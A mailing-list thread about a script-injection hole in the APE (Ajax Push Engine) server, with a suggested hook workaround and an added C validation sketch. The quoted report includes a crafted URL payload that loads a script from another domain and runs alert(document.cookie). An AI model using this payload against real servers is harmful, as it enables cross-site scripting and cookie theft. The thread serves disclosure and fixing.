Can a hook temporarily fix the security hole? For example:
Ape.registerHook("script", function(){
    return false;
});
On Dec 11, 2012 6:56 AM, "tr!ckle" <[email protected]> wrote:
> I managed recently with an issue that allows one to inject any JS script by
> preparing a link like:
>
> http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cscript+type%3D%5C%22text%2Fjavascript%22]}}]
>
> It allows one to either attach a script from your URL or inject a script
> directly, as in this example.
>
> The solution for this issue is to filter both params, domain and scripts, in
> the file src/cmd.c (function: cmd_script()) in the APE server.
>
> --
> You received this message because you are subscribed to the Google
> Groups "APE Project" group.
> To post to this group, send email to [email protected]
> To unsubscribe from this group, send email to
> [email protected]
> For more options, visit this group at
> http://groups.google.com/group/ape-project?hl=en
> ---
> APE Project (Ajax Push Engine)
> Official website : http://www.ape-project.org/
> Git Hub : http://github.com/APE-Project/
>
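The filtering the quoted report proposes for the `domain` and `scripts` params, sketched in C as an added example (not code from the thread or from APE's `src/cmd.c`). The function names and the allow-lists are assumptions; the idea is to reject the whole command before any markup is emitted.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not from APE's src/cmd.c): hostname characters only. */
int is_safe_domain(const char *s)
{
    if (s == NULL || *s == '\0' || *s == '.' || *s == '-')
        return 0;
    for (; *s != '\0'; s++)
        if (!isalnum((unsigned char)*s) && *s != '.' && *s != '-')
            return 0;
    return 1;
}

/* http(s) URL built only from characters that cannot end a quoted HTML
 * attribute or open a tag: no quotes, '<', '>', backslash, space or controls. */
int is_safe_script_url(const char *s)
{
    static const char extra[] = "-._~:/?#[]@!$&()*+,;=%";
    if (s == NULL || (strncmp(s, "http://", 7) != 0 && strncmp(s, "https://", 8) != 0))
        return 0;
    for (; *s != '\0'; s++)
        if (!isalnum((unsigned char)*s) && strchr(extra, *s) == NULL)
            return 0;
    return 1;
}

/* Returns 1 only if the domain and every script URL pass; on 0 the caller
 * should answer with an error instead of writing any part of the page. */
int script_params_ok(const char *domain, const char *const *scripts, size_t count)
{
    if (!is_safe_domain(domain))
        return 0;
    for (size_t i = 0; i < count; i++)
        if (!is_safe_script_url(scripts[i]))
            return 0;
    return 1;
}

int main(void)
{
    /* Constructed samples; the second URL is the start of the value in the report. */
    const char *const good[] = { "http://another.domain.com/your/script.js" };
    const char *const bad[] = { "http://another.domain.com/your/injected/script.js\"></script>" };
    printf("%d %d\n", script_params_ok("any.domain", good, 1), script_params_ok("any.domain", bad, 1));
    return 0;
}
```

The checks apply to the values after JSON decoding, since that is the form that ends up in the generated page.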